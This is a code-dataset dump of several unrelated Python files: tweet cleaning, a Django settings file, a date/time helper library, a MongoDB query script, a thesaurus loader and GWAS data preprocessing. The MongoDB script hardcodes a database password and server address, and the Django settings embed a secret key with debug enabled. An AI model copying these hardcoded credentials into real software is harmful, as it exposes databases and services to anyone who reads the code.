blob_id | directory_id | path | content_id | detected_licenses | license_type | repo_name | snapshot_id | revision_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_event_created_at | gha_created_at | gha_language | src_encoding | language | is_vendor | is_generated | length_bytes | extension | content | authors | author
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fba5b1edc643035c2449182821d32651f04b2fec | ee9aad70746059af6700ec4412a33b9b7664439f | /OrganizedExample/Data/cleanQueryTweetsFormatted.py | 31b0b0e7705109611eb4dd6a6197dfe43de17e10 | [] | no_license | GeethikaRao/twitter-data-analytics | eff78315e028812fa166b54f041582059aaba5ae | 1566f7ea95e4834b68ab9fee2e894165633f612d | refs/heads/master | 2021-06-21T13:45:07.880606 | 2017-08-14T21:23:19 | 2017-08-14T21:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,898 | py | '''
Nathaniel Gottschalt, Reena Sharma, Garikapati Geethika
Data Mining 431 Project
'''
# Take the raw tweets and clean them
import json
import HTMLParser
import string
data = []
with open('queryTweetsRaw.txt') as f:
for line in f:
data.append(json.loads(line))
superlist = []
result = []
#stop words
stopwords = ["rt"]
stopWordsListEdit = []
for value in data:
querywords = value.split()
resultwords = [word for word in querywords if word.lower() not in stopwords]
stopWordsListEdit.append(' '.join(resultwords))
#main cleaning
cleanedWords = []
toBeMoved = []
website = "https"
userNameRemoved = []
APPOSTOPHES = {"'s" : "is", "'re" : "are", "I'm": "I am", "'ll" : "will", "'t" : "not", "'ve " : "have"}
html_parser = HTMLParser.HTMLParser()
for words in stopWordsListEdit:
toBeMoved = []
tweet = html_parser.unescape(words)
tweet = tweet.encode('ascii', 'ignore').decode('ascii')
words = tweet.split()
for word in words:
if word[0:1] != '@':
flag = 0
word = str(word)
for c in string.punctuation:
word = word.replace(c,"")
if website not in word:
for key, value in APPOSTOPHES.iteritems():
if key in word:
if (key == "'t"):
if(word[0:word.find(key)].lower() == "can"):
toBeMoved.append(word[0:word.find(key)])
toBeMoved.append(value)
else:
toBeMoved.append(word[0:word.find(key) - 1])
toBeMoved.append(value)
else:
toBeMoved.append(word[0:word.find(key)])
toBeMoved.append(value)
flag = 1
if(flag == 0):
toBeMoved.append(word)
if(len(toBeMoved) != 0):
userNameRemoved.append(' '.join(toBeMoved))
#remove duplicates
output = []
seen = set()
for value in userNameRemoved:
if value not in seen:
output.append(value)
seen.add(value)
f = open('queryTweetsCleaned.txt', 'w')
for i in range(0, len(output)):
f.write(json.dumps([i + 1, output[i]]) + "\n")
f.close() | [
"[email protected]"
] | |
e72f967c4e0f7d6ff29d147aa687c0c58ba0e8dc | 0d1869abcb1730e3ba0f68078dfbfca37a74d6d6 | /contact_form_mail/settings.py | 3a327f9e0803f53f76e89d0dc22ff1fb8535215a | [] | no_license | michealnaita/contact_form_mail | 5193214d8c011ebf116def79bc65fa6a707aad78 | 3f760ae4969407ce54bf6ea7b3a4cd0597728166 | refs/heads/main | 2023-07-08T04:50:40.458703 | 2021-08-16T09:57:05 | 2021-08-16T09:57:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,272 | py | """
Django settings for contact_form_mail project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-5kplc5-vrburn*c1&^i^#b7!v+(wug@k0j0=d-g$74(#fh6k*f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'contact_form_mail.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'contact_form_mail.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
ae2ae2af70bccd86615425e49b28a242180a53e5 | 95fd5e70b04c76d0acafcab36e2363db5d26ac70 | /when.py | d0bed43cb75aded57e276698c521622b2ca508b2 | [] | no_license | xiocode/xio | 17a87c13b6f4ffc08920696720062bac9d792b52 | a7ffb918fb31224133004f421eb839f43622c4d5 | refs/heads/master | 2021-01-21T22:26:15.497643 | 2013-05-29T17:59:54 | 2013-05-29T17:59:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,357 | py | # -*- coding: utf-8 -*-
""" Friendly Dates and Times """
# Disable pylint's invalid name warning. 'tz' is used in a few places and it
# should be the only thing causing pylint to include the warning.
# pylint: disable-msg=C0103
import calendar
import datetime
import locale
import os
import pytz
import random
import time
# Some functions may take a parameter to designate a return value in UTC
# instead of local time. This will be used to force them to return UTC
# regardless of the paramter's value.
_FORCE_UTC = False
class _FormatsMetaClass(type):
"""Allows the formats class to be treated as an iterable.
    It is important to understand how this class works.
    ``hasattr(formats, 'DATE')`` is true. ``'DATE' in formats`` is false.
    ``hasattr(formats, 'D_FMT')`` is false. ``'D_FMT' in formats`` is true.
This is made possible through the ``__contains__`` and ``__getitem__``
methods. ``__getitem__`` checks for the name of the attribute within
the ``formats`` class. ``__contains__``, on the other hand, checks for
the specified value assigned to an attribute of the class.
"""
DATE = 'D_FMT'
DATETIME = 'D_T_FMT'
TIME = 'T_FMT'
TIME_AMPM = 'T_FMT_AMPM'
def __contains__(self, value):
index = 0
for attr in dir(_FormatsMetaClass):
if not attr.startswith('__') and attr != 'mro' and\
getattr(_FormatsMetaClass, attr) == value:
index = attr
break
return index
def __getitem__(self, attr):
return getattr(_FormatsMetaClass, attr)
def __iter__(self):
for attr in dir(_FormatsMetaClass):
if not attr.startswith('__') and attr != 'mro':
yield attr
formats = _FormatsMetaClass('formats', (object,), {})
formats.__doc__ = """A set of predefined datetime formats.
.. versionadded:: 0.3.0
"""
def _add_time(value, years=0, months=0, weeks=0, days=0,
hours=0, minutes=0, seconds=0, milliseconds=0, microseconds=0):
assert _is_date_type(value)
# If any of the standard timedelta values are used, use timedelta for them.
if seconds or minutes or hours or days or weeks:
delta = datetime.timedelta(weeks=weeks, days=days, hours=hours,
minutes=minutes, seconds=seconds,
milliseconds=milliseconds,
microseconds=microseconds)
value += delta
# Months are tricky. If the current month plus the requested number of
# months is greater than 12 (or less than 1), we'll get a ValueError. After
# figuring out the number of years and months from the number of months,
# shift the values so that we get a valid month.
if months:
more_years, months = divmod(months, 12)
years += more_years
if not (1 <= months + value.month <= 12):
more_years, months = divmod(months + value.month, 12)
months -= value.month
years += more_years
if months or years:
year = value.year + years
month = value.month + months
# When converting from a day in amonth that doesn't exist in the
# ending month, a ValueError will be raised. What follows is an ugly,
# ugly hack to get around this.
try:
value = value.replace(year=year, month=month)
except ValueError:
# When the day in the origin month isn't in the destination month,
# the total number of days in the destination month is needed.
# calendar.mdays would be a nice way to do this except it doesn't
            # account for leap years at all; February always has 28 days.
_, destination_days = calendar.monthrange(year, month)
# I am reluctantly writing this comment as I fear putting the
# craziness of the hack into writing, but I don't want to forget
# what I was doing here so I can fix it later.
#
# The new day will either be 1, 2, or 3. It will be determined by
# the difference in days between the day value of the datetime
# being altered and the number of days in the destination month.
# After that, month needs to be incremented. If that puts the new
# date into January (the value will be 13), year will also need to
# be incremented (with month being switched to 1).
#
# Once all of that has been figured out, a simple replace will do
# the trick.
day = value.day - destination_days
month += 1
if month > 12:
month = 1
year += 1
value = value.replace(year=year, month=month, day=day)
return value
def _is_date_type(value):
    # Acceptable types must be or extend:
# datetime.date
# datetime.time
return isinstance(value, (datetime.date, datetime.time))
def all_timezones():
"""Get a list of all time zones.
This is a wrapper for ``pytz.all_timezones``.
:returns: list -- all time zones.
.. versionadded:: 0.1.0
"""
return pytz.all_timezones
def all_timezones_set():
"""Get a set of all time zones.
This is a wrapper for ``pytz.all_timezones_set``.
:returns: set -- all time zones.
.. versionadded:: 0.1.0
"""
return pytz.all_timezones_set
def common_timezones():
"""Get a list of common time zones.
This is a wrapper for ``pytz.common_timezones``.
:returns: list -- common time zones.
.. versionadded:: 0.1.0
"""
return pytz.common_timezones
def common_timezones_set():
"""Get a set of common time zones.
This is a wrapper for ``pytz.common_timezones_set``.
:returns: set -- common time zones.
.. versionadded:: 0.1.0
"""
return pytz.common_timezones_set
def ever():
"""Get a random datetime.
Instead of using ``datetime.MINYEAR`` and ``datetime.MAXYEAR`` as the
bounds, the current year +/- 100 is used. The thought behind this is that
years that are too extreme will not be as useful.
:returns: datetime.datetime -- a random datetime.
.. versionadded:: 0.3.0
"""
# Get the year bounds
min_year = max(datetime.MINYEAR, today().year - 100)
max_year = min(datetime.MAXYEAR, today().year + 100)
# Get the random values
year = random.randint(min_year, max_year)
month = random.randint(1, 12)
day = random.randint(1, calendar.mdays[month])
hour = random.randint(0, 23)
minute = random.randint(0, 59)
second = random.randint(0, 59)
microsecond = random.randint(0, 1000000)
return datetime.datetime(year=year, month=month, day=day, hour=hour,
minute=minute, second=second,
microsecond=microsecond)
def format(value, format_string):
"""Get a formatted version of a datetime.
This is a wrapper for ``strftime()``. The full list of directives that can
be used can be found at
http://docs.python.org/library/datetime.html#strftime-strptime-behavior.
Predefined formats are exposed through ``when.formats``:
.. data:: when.formats.DATE
Date in locale-based format.
.. data:: when.formats.DATETIME
Date and time in locale-based format.
.. data:: when.formats.TIME
Time in locale-based format.
.. data:: when.formats.TIME_AMPM
12-hour time in locale-based format.
:param value: A datetime object.
:type value: datetime.datetime, datetime.date, datetime.time.
:param format_string: A string specifying formatting the directives or
to use.
:type format_string: str.
:returns: str -- the formatted datetime.
:raises: AssertionError
.. versionadded:: 0.3.0
"""
assert _is_date_type(value)
# Check to see if `format_string` is a value from the `formats` class. If
# it is, obtain the real value from `locale.nl_langinfo()`.
if format_string in formats:
format_string = locale.nl_langinfo(getattr(locale, format_string))
return value.strftime(format_string)
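# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# `format()` accepts either raw strftime directives or one of the predefined
# locale-based formats exposed through `formats`.
def _example_format():
    """Format the current datetime two different ways."""
    print(format(now(), "%Y-%m-%d"))    # explicit strftime directives
    print(format(now(), formats.DATE))  # locale-based date format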
def future(years=0, months=0, weeks=0, days=0,
hours=0, minutes=0, seconds=0, milliseconds=0, microseconds=0,
utc=False):
"""Get a datetime in the future.
``future()`` accepts the all of the parameters of ``datetime.timedelta``,
plus includes the parameters ``years`` and ``months``. ``years`` and
``months`` will add their respective units of time to the datetime.
By default ``future()`` will return the datetime in the system's local
time. If the ``utc`` parameter is set to ``True`` or ``set_utc()`` has been
called, the datetime will be based on UTC instead.
:param years: The number of years to add.
:type years: int.
:param months: The number of months to add.
:type months: int.
:param weeks: The number of weeks to add.
:type weeks: int.
:param days: The number of days to add.
:type days: int.
:param hours: The number of hours to add.
:type hours: int.
:param minutes: The number of minutes to add.
:type minutes: int.
:param seconds: The number of seconds to add.
:type seconds: int.
:param milliseconds: The number of milliseconds to add.
:type milliseconds: int.
:param microseconds: The number of microseconds to add.
:type microseconds: int.
:param utc: Whether or not to use UTC instead of local time.
:type utc: bool.
:returns: datetime.datetime -- the calculated datetime.
.. versionadded:: 0.1.0
"""
return _add_time(now(utc), years=years, months=months, weeks=weeks,
days=days, hours=hours, minutes=minutes, seconds=seconds,
milliseconds=milliseconds, microseconds=microseconds)
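# Illustrative usage sketch (editor's addition): `future()` takes the usual
# `datetime.timedelta` arguments plus `years` and `months`.
def _example_future():
    """Return the local datetime three months and two weeks from now."""
    return future(months=3, weeks=2)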
def how_many_leap_days(from_date, to_date):
"""Get the number of leap days between two dates
:param from_date: A datetime object. If only a year is specified, will use
January 1.
:type from_date: datetime.datetime, datetime.date
:param to_date: A datetime object.. If only a year is specified, will use
January 1.
:type to_date: datetime.datetime, datetime.date
:returns: int -- the number of leap days.
.. versionadded:: 0.3.0
"""
if isinstance(from_date, int):
from_date = datetime.date(from_date, 1, 1)
if isinstance(to_date, int):
to_date = datetime.date(to_date, 1, 1)
assert _is_date_type(from_date) and\
not isinstance(from_date, datetime.time)
assert _is_date_type(to_date) and not isinstance(to_date, datetime.time)
# Both `from_date` and `to_date` need to be of the same type. Since both
# `datetime.date` and `datetime.datetime` will pass the above assertions,
# cast any `datetime.datetime` values to `datetime.date`.
if isinstance(from_date, datetime.datetime):
from_date = from_date.date()
if isinstance(to_date, datetime.datetime):
to_date = to_date.date()
assert from_date <= to_date
number_of_leaps = calendar.leapdays(from_date.year, to_date.year)
# `calendar.leapdays()` calculates the number of leap days by using
# January 1 for the specified years. If `from_date` occurs after
# February 28 in a leap year, remove one leap day from the total. If
# `to_date` occurs after February 28 in a leap year, add one leap day to
# the total.
if calendar.isleap(from_date.year):
month, day = from_date.month, from_date.day
if month > 2 or (month == 2 and day > 28):
number_of_leaps -= 1
if calendar.isleap(to_date.year):
month, day = to_date.month, to_date.day
if month > 2 or (month == 2 and day > 28):
number_of_leaps += 1
return number_of_leaps
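# Illustrative usage sketch (editor's addition): bare ints are promoted to
# January 1 of that year, so this counts the leap days from 2000 through 2020.
def _example_leap_days():
    """Expected result: 6 (2000, 2004, 2008, 2012, 2016, 2020)."""
    return how_many_leap_days(2000, 2021)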
def is_5_oclock():
# Congratulations, you've found an easter egg!
#
# Returns a `datetime.timedelta` object representing how much time is
# remaining until 5 o'clock. If the current time is between 5pm and
# midnight, a negative value will be returned. Keep in mind, a `timedelta`
# is considered negative when the `days` attribute is negative; the values
# for `seconds` and `microseconds` will always be positive.
#
# All values will be `0` at 5 o'clock.
# Because this method deals with local time, the force UTC flag will need
# to be turned off and back on if it has been set.
force = _FORCE_UTC
if force:
unset_utc()
# A `try` is used here to ensure that the UTC flag will be restored
# even if an exception is raised when calling `now()`. This should never
# be the case, but better safe than sorry.
try:
the_datetime = now()
finally:
if force:
set_utc()
five = datetime.time(17)
return datetime.datetime.combine(the_datetime.date(), five) - the_datetime
def is_timezone_aware(value):
"""Check if a datetime is time zone aware.
`is_timezone_aware()` is the inverse of `is_timezone_naive()`.
:param value: A valid datetime object.
:type value: datetime.datetime, datetime.time
:returns: bool -- if the object is time zone aware.
.. versionadded:: 0.3.0
"""
assert hasattr(value, 'tzinfo')
return value.tzinfo is not None and\
value.tzinfo.utcoffset(value) is not None
def is_timezone_naive(value):
"""Check if a datetime is time zone naive.
`is_timezone_naive()` is the inverse of `is_timezone_aware()`.
:param value: A valid datetime object.
:type value: datetime.datetime, datetime.time
:returns: bool -- if the object is time zone naive.
.. versionadded:: 0.3.0
"""
assert hasattr(value, 'tzinfo')
return value.tzinfo is None or value.tzinfo.utcoffset(value) is None
def now(utc=False):
"""Get a datetime representing the current date and time.
By default ``now()`` will return the datetime in the system's local time.
If the ``utc`` parameter is set to ``True`` or ``set_utc()`` has been
called, the datetime will be based on UTC instead.
:param utc: Whether or not to use UTC instead of local time.
:type utc: bool.
:returns: datetime.datetime -- the current datetime.
.. versionadded:: 0.1.0
"""
if _FORCE_UTC or utc:
return datetime.datetime.utcnow()
else:
return datetime.datetime.now()
def past(years=0, months=0, weeks=0, days=0,
hours=0, minutes=0, seconds=0, milliseconds=0, microseconds=0,
utc=False):
"""Get a datetime in the past.
``past()`` accepts the all of the parameters of ``datetime.timedelta``,
plus includes the parameters ``years`` and ``months``. ``years`` and
``months`` will add their respective units of time to the datetime.
By default ``past()`` will return the datetime in the system's local time.
If the ``utc`` parameter is set to ``True`` or ``set_utc()`` has been
called, the datetime will be based on UTC instead.
:param years: The number of years to subtract.
:type years: int.
:param months: The number of months to subtract.
:type months: int.
:param weeks: The number of weeks to subtract.
:type weeks: int.
:param days: The number of days to subtract.
:type days: int.
:param hours: The number of hours to subtract.
:type hours: int.
:param minutes: The number of minutes to subtract.
:type minutes: int.
:param seconds: The number of seconds to subtract.
:type seconds: int.
:param milliseconds: The number of milliseconds to subtract.
:type milliseconds: int.
:param microseconds: The number of microseconds to subtract.
:type microseconds: int.
:param utc: Whether or not to use UTC instead of local time.
:type utc: bool.
:returns: datetime.datetime -- the calculated datetime.
.. versionadded:: 0.1.0
"""
return _add_time(now(utc), years=-years, months=-months, weeks=-weeks,
days=-days, hours=-hours, minutes=-minutes,
seconds=-seconds, milliseconds=milliseconds,
microseconds=microseconds)
def set_utc():
"""Set all datetimes to UTC.
The ``utc`` parameter of other methods will be ignored, with the global
setting taking precedence.
This can be reset by calling ``unset_utc()``.
.. versionadded:: 0.1.0
"""
global _FORCE_UTC # Causes pylint W0603
_FORCE_UTC = True
def shift(value, from_tz=None, to_tz=None, utc=False):
"""Convert a datetime from one time zone to another.
``value`` will be converted from its time zone (when it is time zone aware)
or the time zone specified by ``from_tz`` (when it is time zone naive) to
the time zone specified by ``to_tz``. These values can either be strings
containing the name of the time zone (see ``pytz.all_timezones`` for a list
of all supported values) or a ``datetime.tzinfo`` object.
If no value is provided for either ``from_tz`` (when ``value`` is time zone
naive) or ``to_tz``, the current system time zone will be used. If the
``utc`` parameter is set to ``True`` or ``set_utc()`` has been called,
however, UTC will be used instead.
:param value: A datetime object.
:type value: datetime.datetime, datetime.time.
:param from_tz: The time zone to shift from.
:type from_tz: datetime.tzinfo, str.
:param to_tz: The time zone to shift to.
:type to_tz: datetime.tzinfo, str.
:param utc: Whether or not to use UTC instead of local time.
:type utc: bool.
:returns: datetime.datetime -- the calculated datetime.
:raises: AssertionError
.. versionchanged:: 0.3.0
Added AssertionError for invalid values of ``value``
"""
assert hasattr(value, 'tzinfo')
# Check for a from timezone
# If the datetime is time zone aware, its time zone should be used. If it's
# naive, from_tz must be supplied.
if is_timezone_aware(value):
from_tz = value.tzinfo
else:
if not from_tz:
if _FORCE_UTC or utc:
from_tz = pytz.UTC
else:
from_tz = timezone_object() # Use the system's time zone
else:
if not isinstance(from_tz, datetime.tzinfo):
# This will raise pytz.UnknownTimeZoneError
from_tz = pytz.timezone(from_tz)
# Check for a to timezone
if not to_tz:
if _FORCE_UTC or utc:
to_tz = pytz.UTC
else:
to_tz = timezone_object() # Use the system's time zone
else:
if not isinstance(to_tz, datetime.tzinfo):
# This will raise pytz.UnknownTimeZoneError
to_tz = pytz.timezone(to_tz)
if from_tz == to_tz:
return value
# If the datetime is time zone naive, pytz provides a convenient way to
# covert it to time zone aware. Using replace() directly on the datetime
# results in losing an hour when converting ahead.
if is_timezone_naive(value):
value = from_tz.localize(value)
return value.astimezone(to_tz).replace(tzinfo=None)
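# Illustrative usage sketch (editor's addition): shift a naive datetime from one
# named time zone to another (names come from `pytz.all_timezones`).
def _example_shift():
    """Convert noon on 2014-07-04 from US/Eastern to UTC (returns a naive datetime)."""
    eastern_noon = datetime.datetime(2014, 7, 4, 12, 0)
    return shift(eastern_noon, from_tz="US/Eastern", to_tz="UTC")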
def timezone():
"""Get the name of the current system time zone.
:returns: str -- the name of the system time zone.
.. versionadded:: 0.1.0
"""
def _inner():
""" check for the time zone:
1. as an environment setting (most likely not)
2. in /etc/timezone (hopefully)
3. in /etc/localtime (last chance)
"""
tz = _timezone_from_env() # 1
if tz is not None:
return tz
tz = _timezone_from_etc_timezone() # 2
if tz is not None:
return tz
tz = _timezone_from_etc_localtime() # 3
if tz is not None:
return tz
return '{0}'.format(_inner())
def _timezone_from_env():
""" get the system time zone from os.environ """
if 'TZ' in os.environ:
try:
return pytz.timezone(os.environ['TZ'])
except pytz.UnknownTimeZoneError:
pass
return None
def _timezone_from_etc_localtime():
""" get the system time zone from /etc/loclatime """
matches = []
if os.path.exists('/etc/localtime'):
localtime = pytz.tzfile.build_tzinfo('/etc/localtime',
file('/etc/localtime'))
for tzname in pytz.all_timezones:
tz = pytz.timezone(tzname)
if dir(tz) != dir(localtime):
continue
for attr in dir(tz):
if callable(getattr(tz, attr)) or attr.startswith('__'):
continue
if attr == 'zone' or attr == '_tzinfos':
continue
if getattr(tz, attr) != getattr(localtime, attr):
break
else:
matches.append(tzname)
if matches:
return pytz.timezone(matches[0])
else:
# Causes pylint W0212
pytz._tzinfo_cache['/etc/localtime'] = localtime
return localtime
def _timezone_from_etc_timezone():
""" get the system time zone from /etc/timezone """
if os.path.exists('/etc/timezone'):
tz = file('/etc/timezone').read().strip()
try:
return pytz.timezone(tz)
except pytz.UnknownTimeZoneError:
pass
return None
def timezone_object(tz_name=None):
"""Get the current system time zone.
:param tz_name: The name of the time zone.
:type tz_name: str.
:returns: datetime.tzinfo -- the time zone, defaults to system time zone.
.. versionadded:: 0.1.0
"""
return pytz.timezone(tz_name if tz_name else timezone())
def today():
"""Get a date representing the current date.
:returns: datetime.date -- the current date.
.. versionadded:: 0.1.0
"""
return datetime.date.today()
def tomorrow():
"""Get a date representing tomorrow's date.
:returns: datetime.date -- the current date plus one day.
.. versionadded:: 0.1.0
"""
return datetime.date.today() + datetime.timedelta(days=1)
def unset_utc():
"""Set all datetimes to system time.
The ``utc`` parameter of other methods will be used.
This can be changed by calling ``set_utc()``.
.. versionadded:: 0.1.0
"""
global _FORCE_UTC # Causes pylint W0603
_FORCE_UTC = False
def yesterday():
"""Get a date representing yesterday's date.
:returns: datetime.date -- the current date minus one day.
.. versionadded:: 0.1.0
"""
return past_days(days=1)
def past_days(days=1):
"""Get a date representing yesterday's date.
:returns: datetime.date -- the current date minus one day.
.. versionadded:: 0.1.0
"""
return datetime.date.today() - datetime.timedelta(days=days)
def parse2Timestamp(instance, format='%Y-%m-%d %H:%M:%S'):
if isinstance(instance, basestring):
return time.mktime(time.strptime(instance, format))
elif isinstance(instance, datetime.date):
return time.mktime(instance.timetuple())
def parse2Datetime(timestamp):
return datetime.datetime.fromtimestamp(timestamp=timestamp)
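# Illustrative usage sketch (editor's addition): round-trip a formatted string
# through the two helpers above.
def _example_parse_helpers():
    """Parse a timestamp string and convert it back to a datetime."""
    ts = parse2Timestamp('2019-11-30 12:00:00', format='%Y-%m-%d %H:%M:%S')
    return parse2Datetime(ts)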
def is_weekend():
return datetime.date.today().weekday() in [5, 6]
def get_weekdays(timestamp):
return datetime.date.fromtimestamp(timestamp).weekday()
def date2datetime(date):
return datetime.datetime.fromordinal(date.toordinal()) | [
"[email protected]"
] | |
bdf9507226d0438b749c24b49dab098c9882c567 | f595954c8b22e2a99d18f76035f7c51fbcfd93bc | /server/engine_grs/Backup/mdbconnector.py | f103d0024cf658ae4dd645e03480b67a4dd556ca | [
"MIT"
] | permissive | Teddywonseokyoo/-GRS | eeea883bed7bf69e27c874f8c79a6ab2b9cbbf16 | 23fd7f0542d6cbfc1e39b707788a8f461c7d3249 | refs/heads/master | 2021-01-20T15:51:32.804747 | 2017-06-05T05:07:40 | 2017-06-05T05:07:40 | 90,797,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,154 | py | from pymongo import MongoClient
import pymongo
import urllib
password = urllib.quote_plus('gas1meter2iot')
client = MongoClient('mongodb://grsdatamanager:' + password + '@107.170.216.212')
print client
db = client.grsdata
cursor = db.grstasks.find({"superviser" : "" }).sort([("inputdate", pymongo.ASCENDING) ]).limit(2)
for document in cursor:
print(document)
"""
find end task is null and high task importance
"""
"""
#Greater Than
cursor = collection.find({"importance" : {"$gt": 1}})
for document in cursor:
print(document)
"""
"""
cursor = collection.find({"superviser" : "" })
for document in cursor:
print(document)
"""
"""
cursor = collection.find({"starttime" : {'$ne': 'null' } })
for document in cursor:
print(document)
"""
"""
#Less Than
cursor = collection.find({"importance" : {"$lt": 1}})
for document in cursor:
print(document)
"""
"""
#oreder by
cursor = collection.find().sort([("inputdate", pymongo.ASCENDING) ]) # pymongo.DESCENDING
for document in cursor:
print(document)
"""
# and , or {"$or": [{"cuisine": "Italian"}, {"address.zipcode": "10075"}]})
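# Illustrative usage sketch (editor's addition): an explicit $or query against the
# same collection queried above.
def _example_or_query():
    """Find tasks that are either unassigned or of high importance."""
    return db.grstasks.find({"$or": [{"superviser": ""}, {"importance": {"$gt": 1}}]})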
| [
"[email protected]"
] | |
abde4fa8241af25cdddd5bc2549e057ce4bb89ce | 07b08da4cc5aca9dc025b3b3d35237c273ce406e | /cognitiveSQL/Thesaurus.py | ca297a4b4e28bf89ad29064389d5949b9082a0af | [
"Apache-2.0",
"GPL-3.0-only"
] | permissive | dhmodi/medical-affair-assistant | 971d8f6c3b6eb718b4cd8b15bacfe6d5a0bc5411 | e8fe0e3053f8a7fae03b699a7694ba4ca9e8c75d | refs/heads/master | 2022-06-21T06:33:30.041259 | 2020-05-02T11:21:11 | 2020-05-02T11:21:11 | 119,974,948 | 0 | 0 | Apache-2.0 | 2020-05-02T11:21:40 | 2018-02-02T11:43:06 | Python | UTF-8 | Python | false | false | 1,408 | py | # -*- coding: utf-8 -*
import sys
import importlib
#importlib.reload(sys)
#sys.setdefaultencoding("utf-8")
import unicodedata
class Thesaurus:
def __init__(self):
self.dictionnary = {}
def add_entry(self, word, synonyms):
self.dictionnary[word] = synonyms
def add_synonym_of_a_word(self, word, synonym):
self.dictionnary[word].append(synonym)
def get_synonyms_of_a_word(self, word):
if word in self.dictionnary.keys():
return self.dictionnary[word]
def remove_accents(self, string):
nkfd_form = unicodedata.normalize('NFKD', unicode(string))
return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
def load(self, path):
with open(path) as f:
content = f.readlines()
# we jump content[0] because it is the encoding-type line : useless to parse
for line_id in range(1,len(content)):
if '(' not in content[line_id]:
line = content[line_id].split("|")
word = self.remove_accents(line[0])
synonyms = self.remove_accents(content[line_id + 1]).split("|")
synonyms.pop(0)
self.add_entry(word, synonyms)
def print_me(self):
for keys,values in self.dictionnary.items():
print(keys)
print(values)
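# Illustrative usage sketch (editor's addition): build a small thesaurus in memory
# without loading a file.
def _example_thesaurus():
    """Expected result: ['quick', 'rapid', 'swift']."""
    thesaurus = Thesaurus()
    thesaurus.add_entry("fast", ["quick", "rapid"])
    thesaurus.add_synonym_of_a_word("fast", "swift")
    return thesaurus.get_synonyms_of_a_word("fast")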
| [
"[email protected]"
] | |
5205e0d08b31a6a0750413ca83da64652095801b | 4064264a33e342581a1fe2919df33a8ad40fd6b8 | /Aim2/Modules/UKBBpreprocess.py | b44275612baa9a0c72ea2706ce4069f6cc2e0494 | [] | no_license | ryanyxw/COVIDGenomeAnalysis | 6c6ffdafc1d627a37ec4cb230f476310335734f8 | 1538a59fb260862c8484518a6e2f8b8657860530 | refs/heads/master | 2022-12-08T21:25:18.297812 | 2020-08-20T01:24:49 | 2020-08-20T01:24:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | import numpy as np
import csv, re
import pandas as pd
#Infile = 'I9_CORATHER.gwas.imputed_v3.both_sexes.txt'
def buildtxt(Target_chr, Disease_type, Directory, Infile):
Outfile = "[v2] Pos_and_Pvalue_by_Chr" + str(Target_chr) + "_" + Disease_type +".txt"
open(Outfile, "w")
Output = open(Outfile, "a")
with open (Directory+"\\"+Infile, 'r') as Input:
Output.write("CHR\tPOS\tPvalue\r")
for row in Input:
Snp = re.split('\t|:|\n', row)
if Snp[0] == str(Target_chr):
#print(Snp)
Output.write(Snp[0]+'\t'+Snp[1]+'\t'+Snp[-2]+'\r')
Output.close()
print("[UKBB] ["+Disease_type+" Chr"+str(Target_chr)+"] Build preprocessed txt output success")
return Outfile
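# Illustrative usage sketch (editor's addition): the directory below is a
# hypothetical placeholder; the input file name comes from the comment above.
def _example_buildtxt():
    """Extract chromosome 9 positions and p-values for the I9_CORATHER phenotype."""
    return buildtxt(9, "I9_CORATHER", "data", "I9_CORATHER.gwas.imputed_v3.both_sexes.txt")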
| [
"[email protected]"
] | |
